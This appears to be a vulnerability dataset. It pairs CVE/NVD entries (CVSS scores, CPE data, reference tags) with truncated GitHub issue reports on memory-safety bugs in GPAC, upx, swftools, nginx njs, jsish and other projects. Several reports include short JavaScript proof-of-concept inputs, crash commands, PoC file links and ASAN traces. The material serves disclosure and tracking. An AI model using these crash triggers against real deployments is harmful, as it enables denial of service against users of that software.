"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/appneta/tcpreplay/issues/784 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a reachable assertion in `cidr2cidr()` when the user passes empty cidr string to `tcpprep` in CIDR-split mode.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
```
2. Run Command `$ ./tcpprep --... | [Bug] Reachable assertion in cidr2cidr() at cidr.c:178 | https://api.github.com/repos/appneta/tcpreplay/issues/784/comments | 1 | 2023-03-01T13:03:02Z | 2023-06-05T02:10:42Z | https://github.com/appneta/tcpreplay/issues/784 | 1,604,938,815 | 784 |
CVE-2023-1448 | 2023-03-17T07:15:12.093 | A vulnerability, which was classified as problematic, was found in GPAC 2.3-DEV-rev35-gbbca86917-master. This affects the function gf_m2ts_process_sdt of the file media_tools/mpegts.c. The manipulation leads to heap-based buffer overflow. Attacking locally is a requirement. The exploit has been disclosed to the public ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2388"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/xxy1126/Vuln/blob/main/gpac/3"... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3:dev:*:*:*:*:*:*",
"matchCriteriaId": "0099B624-674B-4F45-9270-DD638617A1D1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | https://github.com/gpac/gpac/issues/2388 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough info... | Heap-buffer-overflow in function gf_m2ts_process_sdt of media_tools/mpegts.c:828 | https://api.github.com/repos/gpac/gpac/issues/2388/comments | 2 | 2023-02-02T14:57:17Z | 2023-03-21T04:19:07Z | https://github.com/gpac/gpac/issues/2388 | 1,568,208,539 | 2,388 |
CVE-2023-1449 | 2023-03-17T07:15:12.347 | A vulnerability has been found in GPAC 2.3-DEV-rev35-gbbca86917-master and classified as problematic. This vulnerability affects the function gf_av1_reset_state of the file media_tools/av_parsers.c. The manipulation leads to double free. It is possible to launch the attack on the local host. The exploit has been disclo... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2387"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/xxy1126/Vuln/bl... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3:dev:*:*:*:*:*:*",
"matchCriteriaId": "0099B624-674B-4F45-9270-DD638617A1D1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | https://github.com/gpac/gpac/issues/2387 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough info... | Double free in gf_av1_reset_state media_tools/av_parsers.c:4024 | https://api.github.com/repos/gpac/gpac/issues/2387/comments | 2 | 2023-02-02T10:24:45Z | 2023-03-21T04:26:10Z | https://github.com/gpac/gpac/issues/2387 | 1,567,763,524 | 2,387 |
CVE-2023-1452 | 2023-03-17T07:15:12.947 | A vulnerability was found in GPAC 2.3-DEV-rev35-gbbca86917-master. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file filters/load_text.c. The manipulation leads to buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2386"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/xxy1126/Vuln/blob/main/gpac/1.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3:dev:*:*:*:*:*:*",
"matchCriteriaId": "0099B624-674B-4F45-9270-DD638617A1D1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | https://github.com/gpac/gpac/issues/2386 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough info... | Buffer overflow in filters/load_text.c:353:14 | https://api.github.com/repos/gpac/gpac/issues/2386/comments | 2 | 2023-02-02T09:53:52Z | 2023-03-21T04:44:47Z | https://github.com/gpac/gpac/issues/2386 | 1,567,701,993 | 2,386 |
CVE-2021-46877 | 2023-03-18T22:15:11.357 | jackson-databind 2.10.x through 2.12.x before 2.12.6 and 2.13.x before 2.13.1 allows attackers to cause a denial of service (2 GB transient heap usage per read) in uncommon situations involving JsonNode JDK serialization. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/issues/3328"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Release Notes"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "439EA36C-3D2E-4B27-B36B-AECEC34E0D8A",
"versionEndExcluding": "2.12.6",
"versionEndIncluding": null,
"version... | https://github.com/FasterXML/jackson-databind/issues/3328 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | There is a report on possible DoS attack, against certain versions of Jackson 2.10.x - 2.13.x (does not affect earlier versions like 2.9, nor future 2.14 and 3.0).
CVE: https://nvd.nist.gov/vuln/detail/CVE-2021-46877
Fix has been included in versions:
* 2.12.6
* 2.13.1
No current plans to back-porting into... | Possible DoS if using JDK serialization to serialize `JsonNode` [CVE-2021-46877] | https://api.github.com/repos/FasterXML/jackson-databind/issues/3328/comments | 21 | 2021-11-20T02:09:34Z | 2023-03-24T16:49:50Z | https://github.com/FasterXML/jackson-databind/issues/3328 | 1,059,035,707 | 3,328 |
CVE-2023-27249 | 2023-03-23T02:15:12.733 | swfdump v0.9.2 was discovered to contain a heap buffer overflow in the function swf_GetPlaceObject at swfobject.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://swfdump.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/keepinggg/poc/blob/main/poc_of_swfdump/poc"
},
{
"source": "cve@... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | https://github.com/matthiaskramm/swftools/issues/197 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | # heap-buffer-overflow
## env
ubuntu20.04
gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)
swfdump - part of swftools 0.9.2
## sample
[poc.zip](https://github.com/keepinggg/poc/blob/main/poc_of_swfdump/poc)
## crash
```
./swfdump -D poc
==2946990==ERROR: AddressSanitizer: heap-buffer-overflow on addres... | heap-buffer-overflow exists in the function swf_GetPlaceObject in swfobject.c | https://api.github.com/repos/swftools/swftools/issues/197/comments | 0 | 2023-02-26T09:28:41Z | 2023-02-26T09:28:41Z | https://github.com/swftools/swftools/issues/197 | 1,599,986,264 | 197 |
CVE-2021-43311 | 2023-03-24T20:15:08.223 | A heap-based buffer overflow was discovered in upx, during the generic pointer 'p' points to an inaccessible address in func get_le32(). The problem is essentially caused in PackLinuxElf32::elf_lookup() at p_lx_elf.cpp:5382. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "patrick@puiterwijk.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/upx/upx/issues/380"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E4C95CD-E2A9-47E3-9866-FD4B7ECF14AA",
"versionEndExcluding": "4.0.0",
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/upx/upx/issues/380 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"upx",
"upx"
] | ## What's the problem (or question)?
Multi heap-based buffer overflows were discovered in upx, during the genric pointer 'p' points to an inaccessible address in func get_le32(). The issue can be triggered by different places, which can cause a denial of service. The issue is diff from [issue365](https://github.com/up... | [bug] multi heap buffer overflows in get_le32() | https://api.github.com/repos/upx/upx/issues/380/comments | 2 | 2020-05-23T14:24:07Z | 2023-04-17T18:03:04Z | https://github.com/upx/upx/issues/380 | 623,670,883 | 380 |
CVE-2021-43312 | 2023-03-24T20:15:08.270 | A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5239. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "patrick@puiterwijk.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/upx/upx/issues/379"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E4C95CD-E2A9-47E3-9866-FD4B7ECF14AA",
"versionEndExcluding": "4.0.0",
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/upx/upx/issues/379 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"upx",
"upx"
] | ## What's the problem (or question)?
A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5239.
ASAN reports:
```bash
==110294==ERROR: AddressSanitizer: hea... | [bug] heap buffer overflow in PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5239 | https://api.github.com/repos/upx/upx/issues/379/comments | 2 | 2020-05-23T14:21:20Z | 2023-04-17T18:13:35Z | https://github.com/upx/upx/issues/379 | 623,670,397 | 379 |
CVE-2021-43313 | 2023-03-24T20:15:08.317 | A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf32::invert_pt_dynamic at p_lx_elf.cpp:1688. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "patrick@puiterwijk.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/upx/upx/issues/378"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E4C95CD-E2A9-47E3-9866-FD4B7ECF14AA",
"versionEndExcluding": "4.0.0",
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/upx/upx/issues/378 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"upx",
"upx"
] | ## What's the problem (or question)?
A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf32::invert_pt_dynamic at p_lx_elf.cpp:1688.
ASAN reports:
```bash
==110358==ERROR: AddressSanitizer: hea... | [bug]heap buffer overflow in PackLinuxElf32::invert_pt_dynamic at p_lx_elf.cpp:1688 | https://api.github.com/repos/upx/upx/issues/378/comments | 2 | 2020-05-23T14:19:31Z | 2023-04-17T18:19:24Z | https://github.com/upx/upx/issues/378 | 623,670,052 | 378 |
CVE-2021-43316 | 2023-03-24T20:15:08.460 | A heap-based buffer overflow was discovered in upx, during the generic pointer 'p' points to an inaccessible address in func get_le64(). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "patrick@puiterwijk.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/upx/upx/issues/381"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E4C95CD-E2A9-47E3-9866-FD4B7ECF14AA",
"versionEndExcluding": "4.0.0",
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/upx/upx/issues/381 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"upx",
"upx"
] | ## What's the problem (or question)?
A heap-based buffer overflow was discovered in upx, during the genric pointer 'p' points to an inaccessible address in func get_le64(). The issue can cause a denial of service. The issue is diff from [issue367](https://github.com/upx/upx/issues/367) and [issue368](https://github.co... | [bug] segv fault in get_le64() | https://api.github.com/repos/upx/upx/issues/381/comments | 2 | 2020-05-23T14:28:34Z | 2023-04-17T18:34:13Z | https://github.com/upx/upx/issues/381 | 623,671,725 | 381 |
CVE-2020-19692 | 2023-04-04T15:15:07.653 | Buffer Overflow vulnerabilty found in Nginx NJS v.0feca92 allows a remote attacker to execute arbitrary code via the njs_module_read in the njs_module.c file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/nginx/njs/issues/187"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nginx:njs:2019-06-27:*:*:*:*:*:*:*",
"matchCriteriaId": "76C92D85-F51F-4CD4-8DC4-BD4428A3C0E1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/nginx/njs/issues/187 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"nginx",
"njs"
] | # env
ubuntu 18.04
njs 0feca92
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)
# bug
So, actually this is a logic bug, happened under an really interesting circumstance.
the buggy function is the njs_module_read in the file njs_module.c
```c
if (fstat(fd, &sb) == -1) {
goto fail;
}
text... | Heap based buffer overflow in njs_module.c | https://api.github.com/repos/nginx/njs/issues/187/comments | 2 | 2019-06-29T03:51:34Z | 2024-05-29T06:53:25Z | https://github.com/nginx/njs/issues/187 | 462,261,788 | 187 |
CVE-2020-19695 | 2023-04-04T15:15:07.747 | Buffer Overflow found in Nginx NJS allows a remote attacker to execute arbitrary code via the njs_object_property parameter of the njs/njs_vm.c function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/nginx/njs/issues/188"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nginx:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "19A4B578-8508-4F14-AF9A-8C6AF2CB12C6",
"versionEndExcluding": "0.3.4",
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/nginx/njs/issues/188 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"nginx",
"njs"
] | # env
ubuntu 18.04
njs 0feca92
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)
built with ASAN on
# bug
```javascript
> (1..__proto__.length = '1', Array.prototype.slice.call(1, 0, 2)).toString()
ASAN:SIGSEGV
=================================================================
==13918==ERROR: AddressSanitize... | Array elements left uninitialized in Array.prototype.slice() for primitive this values. | https://api.github.com/repos/nginx/njs/issues/188/comments | 5 | 2019-07-03T02:04:01Z | 2019-07-03T14:22:16Z | https://github.com/nginx/njs/issues/188 | 463,508,475 | 188 |
CVE-2020-23258 | 2023-04-04T15:15:08.303 | An issue found in Jsish v.3.0.11 allows a remote attacker to cause a denial of service via the Jsi_ValueIsNumber function in ./src/jsiValue.c file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/pcmacdon/jsish/issues/12"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "https://jsish.org/fossil/jsi2/tktview?name=2ba1d89d32"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.0.11:*:*:*:*:*:*:*",
"matchCriteriaId": "DC1BDF14-06F9-4F4F-86E9-CAC99C31A7BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/pcmacdon/jsish/issues/12 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"pcmacdon",
"jsish"
] | DongzhuoZhao added on 2020-05-11 03:55:46:
git version:
4603977ef0ffdaf3d0f641ff6a361aa26e36974d
save follow testcase as .js format :
var v1 = new Array((()=>"toString")(), []);
v1.find(isFinite);
run:
./jsimin poc.js
Result:
zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js
Segmentation ... | Illegal memory dereference in isFiniteCmd | https://api.github.com/repos/pcmacdon/jsish/issues/12/comments | 2 | 2020-05-11T15:54:15Z | 2020-05-13T06:32:08Z | https://github.com/pcmacdon/jsish/issues/12 | 615,992,898 | 12 |
CVE-2020-23259 | 2023-04-04T15:15:08.340 | An issue found in Jsish v.3.0.11 and before allows an attacker to cause a denial of service via the Jsi_Strlen function in the src/jsiChar.c file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/pcmacdon/jsish/issues/13"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "https://jsish.org/fossil/jsi2/tktview?name=b6bb078e00"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:*:*:*:*:*:*:*:*",
"matchCriteriaId": "633EAFF5-6C2C-4EA3-8E68-C899A78ECC1E",
"versionEndExcluding": null,
"versionEndIncluding": "3.0.11",
"versionStartExcluding"... | https://github.com/pcmacdon/jsish/issues/13 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"pcmacdon",
"jsish"
] | DongzhuoZhao added on 2020-05-11 05:31:25:
git version:
4603977ef0ffdaf3d0f641ff6a361aa26e36974d
save follow testcase as .js format :
new Array(- 256, 0, - 2.0).forEach(encodeURI);
run:
./jsimin poc.js
Result:
zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js
Segmentation fault (core dumpe... | Null pointer dereference in url_encode | https://api.github.com/repos/pcmacdon/jsish/issues/13/comments | 1 | 2020-05-11T16:11:11Z | 2020-05-11T23:41:23Z | https://github.com/pcmacdon/jsish/issues/13 | 616,004,519 | 13 |
CVE-2020-23260 | 2023-04-04T15:15:08.373 | An issue found in Jsish v.3.0.11 and before allows an attacker to cause a denial of service via the StringReplaceCmd function in the src/jsiChar.c file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/pcmacdon/jsish/issues/14"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "https://jsish.org/fossil/jsi2/tktview?name=3e211e44b1"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:*:*:*:*:*:*:*:*",
"matchCriteriaId": "633EAFF5-6C2C-4EA3-8E68-C899A78ECC1E",
"versionEndExcluding": null,
"versionEndIncluding": "3.0.11",
"versionStartExcluding"... | https://github.com/pcmacdon/jsish/issues/14 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"pcmacdon",
"jsish"
] | DongzhuoZhao added on 2020-05-11 03:19:36:
git version:
4603977ef0ffdaf3d0f641ff6a361aa26e36974d
save follow testcase as .js format :
v0=/a/g;
var v1="a";
(v1).replace(v0,isFinite);
run:
./jsimin poc.js
Result:
zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js
Segmentation fault (core du... | Illegal memory dereference | https://api.github.com/repos/pcmacdon/jsish/issues/14/comments | 2 | 2020-05-11T16:20:40Z | 2020-05-13T07:03:14Z | https://github.com/pcmacdon/jsish/issues/14 | 616,010,782 | 14 |
CVE-2023-26991 | 2023-04-04T15:15:09.183 | SWFTools v0.9.2 was discovered to contain a stack-use-after-scope in the swf_ReadSWF2 function in lib/rfxswf.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/196"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | https://github.com/matthiaskramm/swftools/issues/196 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | ### Env
Ubuntu 18.04
clang 11.0
swfdump v0.9.2 a part of Swftools v0.9.2
### Reproduce
POC: [poc](https://github.com/yiliang-neo/POC/raw/main/swfdump/POC-swfdump-use-after-scope.swf)
command line:
```
swfdump -D poc
```
### Debug Info
```
==13979==ERROR: AddressSanitizer: stack-use-after-scope on addre... | stack-use-after-scope exists in function swf_ReadSWF2 in lib/rfxswf.c | https://api.github.com/repos/swftools/swftools/issues/196/comments | 0 | 2023-02-16T07:45:42Z | 2023-03-13T07:41:33Z | https://github.com/swftools/swftools/issues/196 | 1,587,191,755 | 196 |
CVE-2023-27727 | 2023-04-09T20:15:56.650 | Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_function_frame at src/njs_function.h. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/nginx/njs/issues/617"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "2784ECC5-66FE-4666-9B7B-6DC080357DEE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": nu... | https://github.com/nginx/njs/issues/617 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"nginx",
"njs"
] | Environment
```
commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976
version: 0.7.10
Build :
./configure --cc=clang --address-sanitizer=YES
make
```
Poc
```js
const v1 = EvalError(EvalError);
Object.defineProperty(v1, "message", { configurable: true, set: EvalError });
delete v1.message;
Eval... | SEGV src/njs_function.h:155:9 in njs_function_frame | https://api.github.com/repos/nginx/njs/issues/617/comments | 0 | 2023-02-21T02:44:30Z | 2023-02-28T06:16:14Z | https://github.com/nginx/njs/issues/617 | 1,592,691,159 | 617 |
CVE-2023-27728 | 2023-04-09T20:15:56.703 | Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_dump_is_recursive at src/njs_vmcode.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/nginx/njs/issues/618"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "2784ECC5-66FE-4666-9B7B-6DC080357DEE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": nu... | https://github.com/nginx/njs/issues/618 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"nginx",
"njs"
] | Environment
```
commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976
version: 0.7.10
Build :
./configure --cc=clang --address-sanitizer=YES
make
```
Poc
```js
Object.defineProperty([], 'a', { configurable: true, enumerable: true, get: Object});
```
Asan
```
==31165==ERROR: AddressSanitizer: ... | SEGV src/njs_json.c in njs_dump_is_recursive | https://api.github.com/repos/nginx/njs/issues/618/comments | 0 | 2023-02-21T02:46:42Z | 2023-02-28T06:16:14Z | https://github.com/nginx/njs/issues/618 | 1,592,692,581 | 618 |
CVE-2023-27729 | 2023-04-09T20:15:56.740 | Nginx NJS v0.7.10 was discovered to contain an illegal memcpy via the function njs_vmcode_return at src/njs_vmcode.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
